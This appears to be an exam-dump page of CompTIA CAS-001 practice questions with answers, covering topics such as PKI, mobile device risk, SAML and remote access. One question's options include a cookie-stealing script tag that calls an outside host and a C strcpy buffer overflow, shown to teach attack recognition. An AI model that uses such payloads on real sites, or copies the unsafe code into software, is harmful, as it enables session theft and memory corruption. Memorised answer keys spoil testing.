Cause all that matters here is passing the CompTIA CAS-001 exam. Cause all that you need is a high score of CAS-001 CompTIA Advanced Security Practitioner exam. The only one thing you need to do is downloading Examcollection CAS-001 exam study guides now. We will not let you down with our money-back guarantee.

2021 Aug CAS-001 exam price

Q321. - (Topic 1) 

Which of the following displays an example of a buffer overflow attack? 

A. <SCRIPT> 

document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie 

</SCRIPT> 

B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc 

e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz 

d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz 

ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 

7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb 

b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb 

C. #include 

char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes 

void main() 

{char buf[8]; 

strcpy(buf, code); 

D. <form action="/cgi-bin/login" method=post> 

Username: <input type=text name=username> 

PassworD.<input type=password name=password> 

<input type=submit value=Login> 

Answer: C 


Q322. - (Topic 3) 

Customer Need: 

“We need the system to produce a series of numbers with no discernible mathematical progression for use by our Java based, PKI-enabled, customer facing website.” 

Which of the following BEST restates the customer need? 

A. The system shall use a pseudo-random number generator seeded the same every time. 

B. The system shall generate a pseudo-random number upon invocation by the existing Java program. 

C. The system shall generate a truly random number based upon user PKI certificates. 

D. The system shall implement a pseudo-random number generator for use by corporate customers. 

Answer: B 


Q323. - (Topic 5) 

An organization has decided to reduce labor costs by outsourcing back office processing of credit applications to a provider located in another country. Data sovereignty and privacy concerns raised by the security team resulted in the third-party provider only accessing and processing the data via remote desktop sessions. To facilitate communications and improve productivity, staff at the third party has been provided with corporate email accounts that are only accessible via the remote desktop sessions. Email forwarding is blocked and staff at the third party can only communicate with staff within the organization. Which of the following additional controls should be implemented to prevent data loss? (Select THREE). 

A. Implement hashing of data in transit 

B. Session recording and capture 

C. Disable cross session cut and paste 

D. Monitor approved credit accounts 

E. User access audit reviews 

F. Source IP whitelisting 

Answer: C,E,F 


Q324. - (Topic 2) 

The increasing complexity of attacks on corporate networks is a direct result of more and more corporate employees connecting to corporate networks with mobile and personal devices. In most cases simply banning these connections and devices is not practical because they support necessary business needs. Which of the following are typical risks and mitigations associated with this new trend? 

A. Risks: Data leakage, lost data on destroyed mobile devices, smaller network attack surface, prohibitive telecommunications costs Mitigations: Device Encryptions, lock screens, certificate based authentication, corporate telecom plans 

B. Risks: Confidentiality leaks through cell conversations, availability of remote corporate data, integrity of data stored on the devices Mitigations: Cellular privacy extensions, mobile VPN clients, over-the-air backups. 

C. Risks: Data exfiltration, loss of data via stolen mobile devices, increased data leakage at the network edge Mitigations: Remote data wipe capabilities, implementing corporate security on personally owned devices 

D. Risks: Theft of mobile devices, unsanctioned applications, minimal device storage, call quality Mitigations: GPS tracking, centralized approved application deployment, over-the-air backups, QoS implementation 

Answer: C 


Q325. - (Topic 3) 

After connecting to a secure payment server at https://pay.xyz.com, an auditor notices that the SSL certificate was issued to *.xyz.com. The auditor also notices that many of the internal development servers use the same certificate. After installing the certificate on dev1.xyz.com, one of the developers reports misplacing the USB thumb-drive where the SSL certificate was stored. Which of the following should the auditor recommend FIRST? 

A. Generate a new public key on both servers. 

B. Replace the SSL certificate on dev1.xyz.com. 

C. Generate a new private key password for both servers. 

D. Replace the SSL certificate on pay.xyz.com. 

Answer: D 


CAS-001 actual test

Most up-to-date CAS-001 free practice questions:

Q326. - (Topic 1) 

After implementing port security, restricting all network traffic into and out of a network, migrating to IPv6, installing NIDS, firewalls, spam and application filters, a security administer is convinced that the network is secure. The administrator now focuses on securing the hosts on the network, starting with the servers. 

Which of the following is the MOST complete list of end-point security software the administrator could plan to implement? 

A. Anti-malware/virus/spyware/spam software, as well as a host based firewall and strong, two-factor authentication. 

B. Anti-virus/spyware/spam software, as well as a host based IDS, firewall, and strong three-factor authentication. 

C. Anti-malware/virus/spyware/spam software, as well as a host based firewall and biometric authentication. 

D. Anti-malware/spam software, as well as a host based firewall and strong, three-factor authentication. 

Answer: A 


Q327. - (Topic 1) 

A project has been established in a large bank to develop a new secure online banking platform. Half way through the development it was discovered that a key piece of software used as part of the base platform is now susceptible to recently published exploits. Who should be contacted FIRST by the project team to discuss potential changes to the platform requirements? 

A. Engineers 

B. Facilities Manager 

C. Stakeholders 

D. Human Resources 

Answer: C 


Q328. - (Topic 5) 

An asset manager is struggling with the best way to reduce the time required to perform asset location activities in a large warehouse. A project manager indicated that RFID might be a valid solution if the asset manager’s requirements were supported by current RFID capabilities. Which of the following requirements would be MOST difficult for the asset manager to implement? 

A. The ability to encrypt RFID data in transmission 

B. The ability to integrate environmental sensors into the RFID tag 

C. The ability to track assets in real time as they move throughout the facility 

D. The ability to assign RFID tags a unique identifier 

Answer: A 


Q329. - (Topic 3) 

The <nameID> element in SAML can be provided in which of the following predefined 

formats? (Select TWO). 

A. X.509 subject name 

B. PTR DNS record 

C. EV certificate OID extension 

D. Kerberos principal name 

E. WWN record name 

Answer: A,D 


Q330. - (Topic 5) 

A security administrator needs to deploy a remote access solution for both staff and contractors. Management favors remote desktop due to ease of use. The current risk assessment suggests protecting Windows as much as possible from direct ingress traffic exposure. Which of the following solutions should be selected? 

A. Deploy a remote desktop server on your internal LAN, and require an active directory integrated SSL connection for access. 

B. Change remote desktop to a non-standard port, and implement password complexity for the entire active directory domain. 

C. Distribute new IPSec VPN client software to applicable parties. Virtualize remote desktop services functionality. 

D. Place the remote desktop server(s) on a screened subnet, and implement two-factor authentication. 

Answer: D